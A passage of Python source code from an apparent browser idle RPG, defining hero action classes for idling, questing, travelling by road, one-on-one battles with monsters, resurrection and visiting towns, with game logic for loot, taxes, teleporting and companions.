get_description_arguments(self):\n return {'hero': self.hero}\n\n def on_heal(self):\n pass\n\n def on_heal_companion(self):\n pass\n\n #####################################\n # management\n #####################################\n @classmethod\n def create(cls, hero, **kwargs):\n '''\n _storage argument used only in creating hero step\n '''\n\n bundle_id = None\n\n if hero.actions.has_actions:\n bundle_id = hero.actions.current_action.bundle_id\n\n # change description of current action\n # when new action ended, it will be illusion, that hero do other new action instead old one\n hero.actions.current_action.description = hero.actions.current_action.get_description()\n\n _storage = None\n if '_storage' in kwargs:\n _storage = kwargs['_storage']\n del kwargs['_storage']\n\n if '_bundle_id' in kwargs:\n bundle_id = kwargs['_bundle_id']\n del kwargs['_bundle_id']\n\n action = cls._create(hero, bundle_id, **kwargs)\n\n if _storage:\n _storage.add_action(action)\n\n elif hero.actions.has_actions:\n hero.actions.current_action.storage.add_action(action)\n\n hero.actions.push_action(action)\n\n return action\n\n def on_remove(self):\n pass\n\n def remove(self, force=False):\n '''\n force - if True, storages will be ignored (need for full remove of angel & hero)\n '''\n\n self.on_remove()\n\n if self.storage:\n self.storage.remove_action(self)\n\n self.hero.actions.pop_action()\n\n self.removed = True\n\n def on_save(self):\n if self.meta_action_id is not None and self.meta_action.updated:\n self.meta_action.save()\n\n def process_action(self):\n self.hero.actions.updated = True\n\n self.process()\n\n # remove only leader action\n # action can set PROCESSED state and create child action\n # is that case we should not remove action\n # it will be removed (by processing of chain actions in LogicStorage) when child action will be processed\n if self.leader and not self.removed and self.state == self.STATE.PROCESSED:\n self.remove()\n\n\n def process_turn(self):\n self.process_action()\n\n def choose_event_reward(self):\n return utils_logic.random_value_by_priority([(record, record.priority) for record in relations.ACTION_EVENT_REWARD.records])\n\n def do_events(self):\n\n habit_events = self.hero.habit_events()\n\n if not habit_events:\n return\n\n event = random.choice(list(habit_events))\n\n event_reward = self.choose_event_reward()\n\n message_type = 'action_event_habit_%s_%s_%s' % (self.TYPE.name.lower(), event.name.lower(), event_reward.name.lower())\n\n if event_reward.is_NOTHING:\n self.hero.add_message(message_type, diary=True, hero=self.hero, **self.action_event_message_arguments())\n elif event_reward.is_MONEY:\n coins = int(math.ceil(f.normal_loot_cost_at_lvl(self.hero.level)))\n self.hero.change_money(MONEY_SOURCE.EARNED_FROM_HABITS, coins)\n self.hero.add_message(message_type, diary=True, hero=self.hero, coins=coins, **self.action_event_message_arguments())\n elif event_reward.is_ARTIFACT:\n artifact, unequipped, sell_price = self.hero.receive_artifact(equip=False, better=False, prefered_slot=False, prefered_item=False, archetype=False)\n self.hero.add_message(message_type, diary=True, hero=self.hero, artifact=artifact, **self.action_event_message_arguments())\n elif event_reward.is_EXPERIENCE:\n experience = self.hero.add_experience(int(c.HABIT_EVENT_EXPERIENCE * random.uniform(1.0-c.HABIT_EVENT_EXPERIENCE_DELTA, 1.0+c.HABIT_EVENT_EXPERIENCE_DELTA)))\n self.hero.add_message(message_type, diary=True, hero=self.hero, experience=experience, **self.action_event_message_arguments())\n\n def action_event_message_arguments(self):\n return {}\n\n searching_quest = False\n\n def setup_quest(self, quest):\n pass # do nothing if there is not quest action\n\n\n def __eq__(self, other):\n\n return (self.removed == other.removed and\n self.TYPE == other.TYPE and\n self.percents == other.percents and\n self.state == other.state and\n self.hero.id == other.hero.id and\n self.context == other.context and\n self.mob_context == other.mob_context and\n self.place_id == other.place_id and\n self.mob == other.mob and\n self.data == other.data and\n self.break_at == other.break_at and\n self.length == other.length and\n self.destination_x == other.destination_x and\n self.destination_y == other.destination_y and\n self.percents_barier == other.percents_barier and\n self.extra_probability == other.extra_probability and\n self.textgen_id == other.textgen_id)\n\n\n\nclass ActionIdlenessPrototype(ActionBase):\n\n TYPE = relations.ACTION_TYPE.IDLENESS\n TEXTGEN_TYPE = 'action_idleness'\n\n @property\n def HELP_CHOICES(self): # pylint: disable=C0103\n choices = set((HELP_CHOICES.START_QUEST, HELP_CHOICES.HEAL, HELP_CHOICES.MONEY, HELP_CHOICES.EXPERIENCE, HELP_CHOICES.STOCK_UP_ENERGY, HELP_CHOICES.HEAL_COMPANION))\n\n if self.percents > 1.0 - E:\n choices.remove(HELP_CHOICES.START_QUEST)\n\n return choices\n\n class STATE(ActionBase.STATE):\n QUEST = 'QUEST'\n IN_PLACE = 'IN_PLACE'\n WAITING = 'WAITING'\n REGENERATE_ENERGY = 'regenerate_energy'\n RETURN = 'RETURN'\n RESURRECT = 'RESURRECT'\n\n ###########################################\n # Object operations\n ###########################################\n\n @classmethod\n def _create(cls, hero=None, bundle_id=None):\n if hero.actions.has_actions:\n return cls( hero=hero,\n bundle_id=bundle_id,\n state=cls.STATE.WAITING)\n else:\n return cls(hero=hero,\n bundle_id=bundle_id,\n percents=1.0,\n state=cls.STATE.WAITING)\n\n def init_quest(self):\n\n if not self.leader:\n return False\n\n self.state = self.STATE.WAITING\n\n self.percents = 1.0\n self.hero.actions.current_action.percents = self.percents\n\n self.updated = True\n\n return True\n\n def preprocess(self):\n if not self.hero.is_alive:\n ActionResurrectPrototype.create(hero=self.hero)\n self.state = self.STATE.RESURRECT\n return True\n\n return False\n\n def process_position(self):\n if self.hero.position.place is None:\n if self.hero.position.road:\n # choose nearest place in road\n if bool(self.hero.position.percents < 0.5) != self.hero.position.invert_direction:\n destination = self.hero.position.road.point_1\n else:\n destination = self.hero.position.road.point_2\n\n ActionMoveToPrototype.create(hero=self.hero, destination=destination)\n else:\n destination = self.hero.position.get_nearest_dominant_place()\n ActionMoveNearPlacePrototype.create(hero=self.hero, place=destination, back=True)\n\n self.state = self.STATE.RETURN\n else:\n self.state = self.STATE.IN_PLACE\n ActionInPlacePrototype.create(hero=self.hero)\n\n return self.state in (self.STATE.IN_PLACE, self.STATE.RETURN)\n\n def process(self):\n\n if self.preprocess():\n return\n\n if self.state == self.STATE.RESURRECT:\n if self.process_position():\n return\n self.state = self.STATE.WAITING\n\n if self.state == self.STATE.RETURN:\n self.state = self.STATE.WAITING\n\n if self.state == self.STATE.IN_PLACE:\n self.state = self.STATE.WAITING\n\n if self.state == self.STATE.REGENERATE_ENERGY:\n self.state = self.STATE.WAITING\n\n if self.state == self.STATE.QUEST:\n self.percents = 0 # reset percents only on quest's ending\n if self.process_position():\n return\n self.state = self.STATE.WAITING\n\n if self.state == self.STATE.WAITING:\n\n if self.hero.position.place is None:\n self.process_position()\n return\n\n self.percents += 1.0 / self.hero.idle_length\n\n if self.percents >= 1.0:\n self.state = self.STATE.QUEST\n ActionQuestPrototype.create(hero=self.hero)\n\n elif self.hero.need_regenerate_energy and self.hero.preferences.energy_regeneration_type != e.ANGEL_ENERGY_REGENERATION_TYPES.SACRIFICE:\n ActionRegenerateEnergyPrototype.create(hero=self.hero)\n self.state = self.STATE.REGENERATE_ENERGY\n\n else:\n if random.uniform(0, 1) < 1.0 / c.TURNS_TO_IDLE / 2: # 1 фраза на два уровня героя\n self.hero.add_message('action_idleness_waiting', hero=self.hero)\n\n\nclass ActionQuestPrototype(ActionBase):\n\n TYPE = relations.ACTION_TYPE.QUEST\n TEXTGEN_TYPE = 'action_quest'\n HELP_CHOICES = set((HELP_CHOICES.HEAL, HELP_CHOICES.MONEY, HELP_CHOICES.EXPERIENCE, HELP_CHOICES.STOCK_UP_ENERGY, HELP_CHOICES.HEAL_COMPANION))\n APPROVED_FOR_STEPS_CHAIN = False # all quest actions MUST be done on separated turns\n\n class STATE(ActionBase.STATE):\n SEARCHING = 'searching'\n PROCESSING = 'processing'\n EQUIPPING = 'equipping'\n\n ###########################################\n # Object operations\n ###########################################\n\n @classmethod\n def _create(cls, hero, bundle_id):\n return cls(hero=hero,\n bundle_id=bundle_id,\n state=cls.STATE.SEARCHING)\n\n @property\n def searching_quest(self):\n return self.state == self.STATE.SEARCHING\n\n def setup_quest(self, quest):\n if self.state != self.STATE.SEARCHING:\n return\n\n self.hero.quests.push_quest(quest)\n\n self.state = self.STATE.PROCESSING\n\n\n def process(self):\n\n if self.state == self.STATE.SEARCHING:\n if self.hero.quests.has_quests:\n self.state = self.STATE.PROCESSING\n else:\n # a lot of test depans on complete processing of this action\n # so it is easie to emulate quest generation here, then place everywere mock objects\n if project_settings.TESTS_RUNNING:\n from the_tale.game.quests.tests import helpers as quests_helpers\n quests_helpers.setup_quest(self.hero)\n else:\n quests_logic.request_quest_for_hero(self.hero)\n\n if self.state == self.STATE.EQUIPPING:\n self.state = self.STATE.PROCESSING\n\n if self.state == self.STATE.PROCESSING:\n\n if not self.hero.quests.has_quests:\n self.state = self.STATE.PROCESSED\n return\n\n if self.hero.need_equipping:\n self.state = self.STATE.EQUIPPING\n ActionEquippingPrototype.create(hero=self.hero)\n\n percents = self.hero.quests.current_quest.process()\n\n self.percents = percents\n\n if self.hero.quests.current_quest.is_processed:\n self.hero.quests.pop_quest()\n self.state = self.STATE.PROCESSED\n\n\nclass ActionMoveToPrototype(ActionBase):\n\n TYPE = relations.ACTION_TYPE.MOVE_TO\n TEXTGEN_TYPE = 'action_moveto'\n\n @property\n def HELP_CHOICES(self):\n choices = set((HELP_CHOICES.HEAL, HELP_CHOICES.MONEY, HELP_CHOICES.EXPERIENCE, HELP_CHOICES.STOCK_UP_ENERGY, HELP_CHOICES.HEAL_COMPANION))\n\n if self.state == self.STATE.MOVING:\n choices.add(HELP_CHOICES.TELEPORT)\n\n return choices\n\n\n class STATE(ActionBase.STATE):\n CHOOSE_ROAD = 'choose_road'\n MOVING = 'moving'\n IN_CITY = 'in_city'\n BATTLE = 'battle'\n REGENERATE_ENERGY = 'regenerate_energy'\n RESTING = 'resting'\n RESURRECT = 'resurrect'\n HEALING_COMPANION = 'healing_companion'\n\n @property\n def destination_id(self): return self.place_id\n\n @property\n def destination(self): return self.place\n\n ###########################################\n # Object operations\n ###########################################\n\n\n @classmethod\n def _create(cls, hero, bundle_id, destination, break_at=None):\n prototype = cls(hero=hero,\n bundle_id=bundle_id,\n place_id=destination.id,\n break_at=break_at,\n state=cls.STATE.CHOOSE_ROAD)\n hero.add_message('action_moveto_start', hero=hero, destination=destination)\n return prototype\n\n def get_description_arguments(self):\n args = super(ActionMoveToPrototype, self).get_description_arguments()\n args.update({'destination': self.place})\n return args\n\n def teleport(self, distance, create_inplace_action):\n\n if self.state != self.STATE.MOVING:\n return False\n\n stop_percents = self.break_at if self.break_at else 1\n\n max_road_distance = self.hero.position.road.length * (1 - self.hero.position.percents)\n max_action_distance = self.length * (stop_percents - self.percents )\n\n distance = min(distance, min(max_road_distance, max_action_distance))\n\n self.hero.position.percents += distance / self.hero.position.road.length\n\n if self.length > E:\n self.percents += distance / self.length\n\n if self.hero.position.percents + E > 1:\n self.hero.position.percents = 1\n self.place_hero_in_current_destination(create_action=create_inplace_action)\n\n if self.percents + E > stop_percents:\n self.state = self.STATE.PROCESSED\n\n self.updated = True\n\n return True\n\n def teleport_to_place(self, create_inplace_action):\n\n if self.state != self.STATE.MOVING:\n return False\n\n return self.teleport(distance=self.hero.position.road.length+1, create_inplace_action=create_inplace_action)\n\n def teleport_to_end(self):\n if self.state != self.STATE.MOVING:\n return False\n\n while True:\n if not self.teleport_to_place(create_inplace_action=False):\n return False\n\n if self.state == self.STATE.PROCESSED:\n if self.hero.position.place:\n ActionInPlacePrototype.create(hero=self.hero)\n return True\n\n self.process_choose_road()\n\n @property\n def current_destination(self): return self.hero.position.road.point_2 if not self.hero.position.invert_direction else self.hero.position.road.point_1\n\n def preprocess(self):\n if self.replane_required:\n self.state = self.STATE.PROCESSED\n return True\n\n if not self.hero.is_alive:\n ActionResurrectPrototype.create(hero=self.hero)\n self.state = self.STATE.RESURRECT\n return True\n\n if self.hero.need_rest_in_move:\n ActionRestPrototype.create(hero=self.hero)\n self.state = self.STATE.RESTING\n return True\n\n if self.hero.companion_need_heal():\n ActionHealCompanionPrototype.create(hero=self.hero)\n self.state = self.STATE.HEALING_COMPANION\n return True\n\n return False\n\n def process_choose_road__in_place(self):\n if self.hero.position.place_id != self.destination_id:\n waymark = waymarks_storage.look_for_road(point_from=self.hero.position.place_id, point_to=self.destination_id)\n length = waymark.length\n self.hero.position.set_road(waymark.road, invert=(self.hero.position.place_id != waymark.road.point_1_id))\n self.state = self.STATE.MOVING\n else:\n length = None\n self.state = self.STATE.PROCESSED\n\n return length\n\n def process_choose_road__in_road(self):\n waymark = waymarks_storage.look_for_road(point_from=self.hero.position.road.point_1_id, point_to=self.destination_id)\n road_left = waymark.road\n length_left = waymark.length\n\n waymark = waymarks_storage.look_for_road(point_from=self.hero.position.road.point_2_id, point_to=self.destination_id)\n road_right = waymark.road\n length_right = waymark.length\n\n if not self.hero.position.invert_direction:\n delta_left = self.hero.position.percents * self.hero.position.road.length\n else:\n delta_left = (1 - self.hero.position.percents) * self.hero.position.road.length\n delta_rigth = self.hero.position.road.length - delta_left\n\n if road_left is None:\n invert = True\n elif road_right is None:\n invert = False\n else:\n invert = (length_left + delta_left) < (delta_rigth + length_right)\n\n if invert:\n length = length_left + delta_left\n else:\n length = length_right + delta_rigth\n\n percents = self.hero.position.percents\n if self.hero.position.invert_direction and not invert:\n percents = 1 - percents\n elif not self.hero.position.invert_direction and invert:\n percents = 1 - percents\n\n if length < 0.01:\n self.place_hero_in_current_destination()\n else:\n self.hero.position.set_road(self.hero.position.road, invert=invert, percents=percents)\n self.state = self.STATE.MOVING\n\n return length\n\n\n def process_choose_road(self):\n if self.hero.position.place_id:\n length = self.process_choose_road__in_place()\n else:\n length = self.process_choose_road__in_road()\n\n if self.length is None:\n self.length = length\n\n if self.hero.companion and self.state == self.STATE.MOVING and random.random() < self.hero.companion_teleport_probability:\n self.hero.add_message('companions_teleport', companion_owner=self.hero, companion=self.hero.companion, destination=self.current_destination)\n self.teleport_to_place(create_inplace_action=True)\n return\n\n def normal_move(self):\n\n if self.hero.companion and self.hero.can_companion_say_wisdom() and random.random() < self.hero.companion_say_wisdom_probability:\n self.hero.add_experience(c.COMPANIONS_EXP_PER_MOVE_GET_EXP, without_modifications=True)\n self.hero.add_message('companions_say_wisdom', companion_owner=self.hero, companion=self.hero.companion, experience=c.COMPANIONS_EXP_PER_MOVE_GET_EXP)\n\n elif random.uniform(0, 1) < c.HABIT_MOVE_EVENTS_IN_TURN:\n self.do_events()\n\n elif random.uniform(0, 1) < 0.33:\n if self.destination.id != self.current_destination.id and random.uniform(0, 1) < 0.04: # TODO: change probability, when there are move phrases\n self.hero.add_message('action_moveto_move_long_path',\n hero=self.hero,\n destination=self.destination,\n current_destination=self.current_destination)\n else:\n self.hero.add_message('action_moveto_move',\n hero=self.hero,\n destination=self.destination,\n current_destination=self.current_destination)\n\n if self.hero.companion and random.random() < self.hero.companion_fly_probability:\n self.hero.add_message('companions_fly', companion_owner=self.hero, companion=self.hero.companion)\n self.teleport(c.ANGEL_HELP_TELEPORT_DISTANCE, create_inplace_action=True)\n return\n\n move_speed = self.hero.position.modify_move_speed(self.hero.move_speed)\n\n delta = move_speed / self.hero.position.road.length\n\n self.hero.position.percents += delta\n\n if self.length > 0.001:\n self.percents += move_speed / self.length\n else:\n self.percents = 1\n\n def picked_up_in_road(self):\n current_destination = self.current_destination # save destination befor telefort, since it can be reseted after we perfom it\n\n if self.teleport(c.PICKED_UP_IN_ROAD_TELEPORT_LENGTH, create_inplace_action=True):\n\n self.hero.add_message('action_moveto_picked_up_in_road',\n hero=self.hero,\n destination=self.destination,\n current_destination=current_destination)\n\n\n\n def process_moving(self):\n\n if self.hero.need_regenerate_energy and self.hero.preferences.energy_regeneration_type != e.ANGEL_ENERGY_REGENERATION_TYPES.SACRIFICE:\n ActionRegenerateEnergyPrototype.create(hero=self.hero)\n self.state = self.STATE.REGENERATE_ENERGY\n\n elif self.hero.position.is_battle_start_needed():\n mob = mobs_storage.create_mob_for_hero(self.hero)\n ActionBattlePvE1x1Prototype.create(hero=self.hero, mob=mob)\n self.state = self.STATE.BATTLE\n\n else:\n if self.hero.can_picked_up_in_road():\n self.picked_up_in_road()\n else:\n self.normal_move()\n\n if self.hero.position.percents >= 1:\n self.place_hero_in_current_destination()\n\n elif self.percents >= 1:\n self.state = self.STATE.PROCESSED\n\n elif self.break_at is not None and self.break_at < self.percents:\n self.state = self.STATE.PROCESSED\n\n def place_hero_in_current_destination(self, create_action=True):\n self.hero.position.percents = 1\n self.hero.position.set_place(self.current_destination)\n self.state = self.STATE.IN_CITY\n if create_action:\n ActionInPlacePrototype.create(hero=self.hero)\n\n def process(self):\n\n if self.preprocess():\n return\n\n if self.state in (self.STATE.RESTING, self.STATE.RESURRECT, self.STATE.REGENERATE_ENERGY, self.STATE.IN_CITY, self.STATE.HEALING_COMPANION):\n self.state = self.STATE.CHOOSE_ROAD\n\n if self.state == self.STATE.BATTLE:\n if not self.hero.is_alive:\n ActionResurrectPrototype.create(hero=self.hero)\n self.state = self.STATE.RESURRECT\n else:\n if self.hero.need_rest_in_move:\n ActionRestPrototype.create(hero=self.hero)\n self.state = self.STATE.RESTING\n elif self.hero.need_regenerate_energy:\n ActionRegenerateEnergyPrototype.create(hero=self.hero)\n self.state = self.STATE.REGENERATE_ENERGY\n elif self.hero.companion_need_heal():\n ActionHealCompanionPrototype.create(hero=self.hero)\n self.state = self.STATE.HEALING_COMPANION\n else:\n self.state = self.STATE.MOVING\n\n if self.state == self.STATE.CHOOSE_ROAD:\n self.process_choose_road()\n\n if self.state == self.STATE.MOVING:\n self.process_moving()\n\n\nclass ActionBattlePvE1x1Prototype(ActionBase):\n\n TYPE = relations.ACTION_TYPE.BATTLE_PVE_1X1\n TEXTGEN_TYPE = 'action_battlepve1x1'\n CONTEXT_MANAGER = contexts.BattleContext\n HABIT_MODE = relations.ACTION_HABIT_MODE.AGGRESSIVE\n\n @property\n def HELP_CHOICES(self): # pylint: disable=C0103\n if not self.hero.is_alive:\n return set((HELP_CHOICES.RESURRECT,))\n if self.mob.health <= 0:\n return set((HELP_CHOICES.HEAL, HELP_CHOICES.MONEY, HELP_CHOICES.EXPERIENCE, HELP_CHOICES.STOCK_UP_ENERGY, HELP_CHOICES.HEAL_COMPANION))\n return set((HELP_CHOICES.LIGHTING, HELP_CHOICES.HEAL, HELP_CHOICES.MONEY, HELP_CHOICES.EXPERIENCE, HELP_CHOICES.STOCK_UP_ENERGY, HELP_CHOICES.HEAL_COMPANION))\n\n class STATE(ActionBase.STATE):\n BATTLE_RUNNING = 'battle_running'\n\n ###########################################\n # Object operations\n ###########################################\n\n def get_info_link(self):\n return url('guide:mobs:info', self.mob.record.id)\n\n @classmethod\n def _create(cls, hero, bundle_id, mob):\n\n kill_before_battle = hero.can_kill_before_battle()\n can_peacefull_battle = hero.can_peacefull_battle(mob.mob_type)\n can_leave_battle_in_fear = hero.can_leave_battle_in_fear()\n companions_is_exorcist = hero.companion and hero.can_companion_do_exorcism() and random.random() < hero.companion_do_exorcism_probability\n\n instant_kill_mob = False\n\n if kill_before_battle:\n percents = 1.0\n state = cls.STATE.PROCESSED\n hero.add_message('action_battlepve1x1_kill_before_start', hero=hero, mob=mob)\n instant_kill_mob = True\n elif can_peacefull_battle:\n percents = 1.0\n state = cls.STATE.PROCESSED\n hero.add_message('action_battlepve1x1_peacefull_battle', hero=hero, mob=mob)\n elif can_leave_battle_in_fear:\n percents = 1.0\n state = cls.STATE.PROCESSED\n hero.add_message('action_battlepve1x1_leave_battle_in_fear', hero=hero, mob=mob)\n elif companions_is_exorcist and mob.mob_type.is_DEMON:\n percents = 1.0\n state = cls.STATE.PROCESSED\n hero.add_message('action_battlepve1x1_companion_do_exorcims', hero=hero, mob=mob, companion=hero.companion)\n instant_kill_mob = True\n else:\n percents = 0.0\n state = cls.STATE.BATTLE_RUNNING\n hero.add_message('action_battlepve1x1_start', hero=hero, mob=mob)\n\n prototype = cls( hero=hero,\n bundle_id=bundle_id,\n context=cls.CONTEXT_MANAGER(),\n mob=mob,\n mob_context=cls.CONTEXT_MANAGER(),\n percents=percents,\n state=state)\n\n if instant_kill_mob:\n prototype._kill_mob()\n\n return prototype\n\n def get_description_arguments(self):\n args = super(ActionBattlePvE1x1Prototype, self).get_description_arguments()\n args.update({'mob': self.mob})\n return args\n\n def bit_mob(self, percents):\n\n if self.state != self.STATE.BATTLE_RUNNING:\n return False\n\n self.mob.strike_by(percents)\n\n self.percents = 1.0 - self.mob.health_percents\n self.hero.actions.current_action.percents = self.percents\n\n if self.mob.health <= 0:\n self.on_mob_killed()\n\n self.updated = True\n\n return True\n\n def fast_resurrect(self):\n if self.state != self.STATE.PROCESSED: # hero can be dead only if action already processed\n return False\n\n if self.hero.is_alive:\n return False\n\n self.hero.resurrect()\n\n self.updated = True\n return True\n\n def _kill_mob(self, hero_alive=True):\n self.mob.kill()\n self.hero.statistics.change_pve_kills(1)\n\n if not hero_alive:\n return\n\n loot = artifacts_storage.generate_loot(self.hero, self.mob)\n\n if loot is not None:\n bag_uuid = self.hero.put_loot(loot)\n\n if bag_uuid is not None:\n if loot.is_useless:\n self.hero.statistics.change_loot_had(1)\n else:\n self.hero.statistics.change_artifacts_had(1)\n self.hero.add_message('action_battlepve1x1_put_loot', hero=self.hero, artifact=loot, mob=self.mob)\n else:\n self.hero.add_message('action_battlepve1x1_put_loot_no_space', hero=self.hero, artifact=loot, mob=self.mob)\n else:\n self.hero.add_message('action_battlepve1x1_no_loot', hero=self.hero, mob=self.mob)\n\n if self.hero.can_get_exp_for_kill():\n raw_experience = int(c.EXP_FOR_KILL*random.uniform(1.0-c.EXP_FOR_KILL_DELTA, 1.0+c.EXP_FOR_KILL_DELTA))\n real_experience = self.hero.add_experience(raw_experience)\n self.hero.add_message('action_battlepve1x1_exp_for_kill', hero=self.hero, mob=self.mob, diary=True, experience=real_experience)\n\n if (self.hero.companion and\n self.hero.companion.health < self.hero.companion.max_health and\n self.hero.can_companion_eat_corpses() and\n random.random() < self.hero.companion_eat_corpses_probability and\n self.mob.mob_type.is_eatable):\n health = self.hero.companion.heal(c.COMPANIONS_EATEN_CORPSES_HEAL_AMOUNT)\n self.hero.add_message('companions_eat_corpse', companion_owner=self.hero, companion=self.hero.companion, health=health, mob=self.mob)\n\n\n def process_artifact_breaking(self):\n\n self.hero.damage_integrity()\n\n if random.uniform(0.0, 1.0) > c.ARTIFACTS_BREAKS_PER_BATTLE:\n return\n\n artifacts = self.hero.artifacts_to_break()\n\n if not len(artifacts):\n return\n\n artifact = utils_logic.random_value_by_priority([(artifact, 1 - artifact.integrity_fraction) for artifact in artifacts])\n\n artifact.break_it()\n self.hero.add_message('action_battlepve1x1_artifact_broken', hero=self.hero, mob=self.mob, diary=True, artifact=artifact)\n\n def on_mob_killed(self):\n self.hero.add_message('action_battlepve1x1_mob_killed', hero=self.hero, mob=self.mob)\n self._kill_mob()\n self.state = self.STATE.PROCESSED\n\n def on_hero_killed(self):\n self.hero.kill()\n self.hero.statistics.change_pve_deaths(1)\n self.hero.add_message('action_battlepve1x1_diary_hero_killed', diary=True, journal=False, hero=self.hero, mob=self.mob)\n self.hero.add_message('action_battlepve1x1_journal_hero_killed', hero=self.hero, mob=self.mob)\n self.state = self.STATE.PROCESSED\n\n def on_both_killed(self):\n self._kill_mob(hero_alive=False)\n self.hero.kill()\n self.hero.statistics.change_pve_deaths(1)\n self.hero.add_message('action_battlepve1x1_diary_hero_and_mob_killed', diary=True, journal=False, hero=self.hero, mob=self.mob)\n self.hero.add_message('action_battlepve1x1_journal_hero_and_mob_killed', hero=self.hero, mob=self.mob)\n self.state = self.STATE.PROCESSED\n\n def process(self):\n\n if self.state == self.STATE.BATTLE_RUNNING:\n\n # make turn only if mob still alive (it can be killed by angel)\n if self.mob.health > 0:\n battle.make_turn(battle.Actor(self.hero, self.context),\n battle.Actor(self.mob, self.mob_context),\n self.hero)\n self.percents = 1.0 - self.mob.health_percents\n\n if self.hero.health <= 0:\n if self.mob.health <= 0:\n self.on_both_killed()\n else:\n self.on_hero_killed()\n\n elif self.mob.health <= 0:\n self.on_mob_killed()\n\n if self.state == self.STATE.PROCESSED:\n self.process_artifact_breaking()\n\n\nclass ActionResurrectPrototype(ActionBase):\n\n TYPE = relations.ACTION_TYPE.RESURRECT\n TEXTGEN_TYPE = 'action_resurrect'\n HELP_CHOICES = set((HELP_CHOICES.RESURRECT,))\n\n class STATE(ActionBase.STATE):\n RESURRECT = 'resurrect'\n\n @classmethod\n def _create(cls, hero, bundle_id):\n hero.add_message('action_resurrect_start', hero=hero)\n\n return cls( hero=hero,\n bundle_id=bundle_id,\n state=cls.STATE.RESURRECT)\n\n def fast_resurrect(self):\n if self.state != self.STATE.RESURRECT:\n return False\n\n self.hero.actions.current_action.percents = self.percents\n\n self.hero.resurrect()\n self.state = self.STATE.PROCESSED\n\n self.updated = True\n return True\n\n\n def process(self):\n\n if self.state == self.STATE.RESURRECT:\n\n self.percents += 1.0 / self.hero.resurrect_length\n\n if random.uniform(0, 1) < 1.0 / c.TURNS_TO_RESURRECT / 2: # 1 фраза на два уровня героя\n self.hero.add_message('action_resurrect_resurrecting', hero=self.hero)\n\n if self.percents >= 1:\n self.hero.resurrect()\n self.state = self.STATE.PROCESSED\n self.hero.add_message('action_resurrect_finish', hero=self.hero)\n\n\nclass ActionInPlacePrototype(ActionBase):\n\n TYPE = relations.ACTION_TYPE.IN_PLACE\n TEXTGEN_TYPE = 'action_inplace'\n HELP_CHOICES = set((HELP_CHOICES.HEAL, HELP_CHOICES.MONEY, HELP_CHOICES.EXPERIENCE, HELP_CHOICES.STOCK_UP_ENERGY, HELP_CHOICES.HEAL_COMPANION))\n\n class STATE(ActionBase.STATE):\n SPEND_MONEY = 'spend_money'\n REGENERATE_ENERGY = 'regenerate_energy'\n CHOOSING = 'choosing'\n TRADING = 'trading'\n RESTING = 'resting'\n EQUIPPING = 'equipping'\n HEALING_COMPANION = 'healing_companion'\n\n ###########################################\n # Object operations\n ###########################################\n\n @classmethod\n def _create(cls, hero, bundle_id):\n prototype = cls( hero=hero,\n bundle_id=bundle_id,\n state=cls.STATE.SPEND_MONEY)\n\n if hero.position.place.modifier:\n if hero.health < hero.max_health and hero.position.place.modifier.full_regen_allowed():\n hero.health = hero.max_health\n hero.add_message('action_inplace_instant_heal', hero=hero, place=hero.position.place)\n\n if hero.companion and hero.companion.health < hero.companion.max_health and hero.position.place.modifier.companion_regen_allowed():\n healed_health = hero.companion.heal(c.COMPANIONS_HEAL_AMOUNT)\n hero.add_message('action_inplace_companion_heal', hero=hero, place=hero.position.place, companion=hero.companion, health=healed_health)\n\n if (hero.energy < hero.energy_maximum and\n hero.position.place.modifier and hero.position.place.modifier.energy_regen_allowed() and\n hero.position.place != hero.position.previous_place):\n hero.change_energy(c.ANGEL_ENERGY_INSTANT_REGENERATION_IN_PLACE)\n hero.add_message('action_inplace_instant_energy_regen', hero=hero, place=hero.position.place)\n\n if (hero.position.place.tax > 0 and\n hero.position.place != hero.position.previous_place):\n\n if hero.money > 0:\n tax = int(hero.money * hero.position.place.tax)\n hero.change_money(MONEY_SOURCE.SPEND_FOR_TAX, -tax)\n hero.add_message('action_inplace_tax', hero=hero, place=hero.position.place, coins=tax, diary=True)\n else:\n hero.add_message('action_inplace_tax_no_money', hero=hero, place=hero.position.place, diary=True)\n\n if ( hero.position.place.can_habit_event() and\n hero.position.place != hero.position.previous_place ):\n\n if random.uniform(0, 1) < 0.5:\n hero.add_message('action_inplace_habit_event_honor_%s' % hero.position.place.habit_honor.interval.name.lower(),\n hero=hero, place=hero.position.place, diary=True)\n else:\n hero.add_message('action_inplace_habit_event_peacefulness_%s' % hero.position.place.habit_peacefulness.interval.name.lower(),\n hero=hero, place=hero.position.place, diary=True)\n\n if hero.companion and hero.position.place != hero.position.previous_place and hero.position.previous_place is not None:\n\n if hero.can_companion_eat():\n waymark = waymarks_storage.look_for_road(point_from=hero.position.previous_place.id, point_to=hero.position.place)\n coins = min(hero.money, int(math.ceil(f.gold_in_path(hero.level, waymark.length) * hero.companion_money_for_food_multiplier)+1))\n\n if coins > 0:\n hero.change_money(MONEY_SOURCE.SPEND_FOR_COMPANIONS, -coins)\n hero.add_message('action_inplace_companion_money_for_food', hero=hero, place=hero.position.place, companion=hero.companion, coins=coins)\n\n if not hero.bag.is_empty and hero.can_companion_drink_artifact() and random.random() < hero.companion_drink_artifact_probability:\n artifact = random.choice(hero.bag.values())\n hero.pop_loot(artifact)\n hero.add_message('action_inplace_companion_drink_artifact', hero=hero, place=hero.position.place, artifact=artifact, companion=hero.companion)\n\n if random.random() < hero.companion_leave_in_place_probability:\n hero.add_message('action_inplace_companion_leave', diary=True, hero=hero, place=hero.position.place, companion=hero.companion)\n hero.remove_companion()\n\n\n hero.position.visit_current_place()\n\n return prototype\n\n def action_event_message_arguments(self):\n return {'place': self.hero.position.place}\n\n def get_description_arguments(self):\n args = super(ActionInPlacePrototype, self).get_description_arguments()\n args.update({'place': self.hero.position.place})\n return args\n\n def process(self):\n return self.process_settlement()\n\n def try_to_spend_money(self):\n gold_amount = self.hero.modify_buy_price(self.hero.spend_amount)\n if gold_amount <= self.hero.money:\n self.hero.change_money(self.hero.next_spending.money_source, -gold_amount)\n self.hero.switch_spending()\n return gold_amount\n\n return None\n\n def spend_money__instant_heal(self):\n if self.hero.health > self.hero.max_health * c.SPEND_MONEY_FOR_HEAL_HEALTH_FRACTION:\n return\n\n coins = self.try_to_spend_money()\n if coins is not None:\n self.hero.health = self.hero.max_health\n self.hero.add_message('action_inplace_diary_instant_heal_for_money', diary=True, hero=self.hero, coins=coins)\n\n def spend_money__buying_artifact(self):\n if self.hero.need_equipping:\n # delay money spenging, becouse hero can buy artifact better then equipped but worse then he has in bag\n return\n\n coins = self.try_to_spend_money()\n if coins is not None:\n\n artifact, unequipped, sell_price = self.hero.receive_artifact(equip=True,\n better=True,\n prefered_slot=True,\n prefered_item=True,\n archetype=True,\n 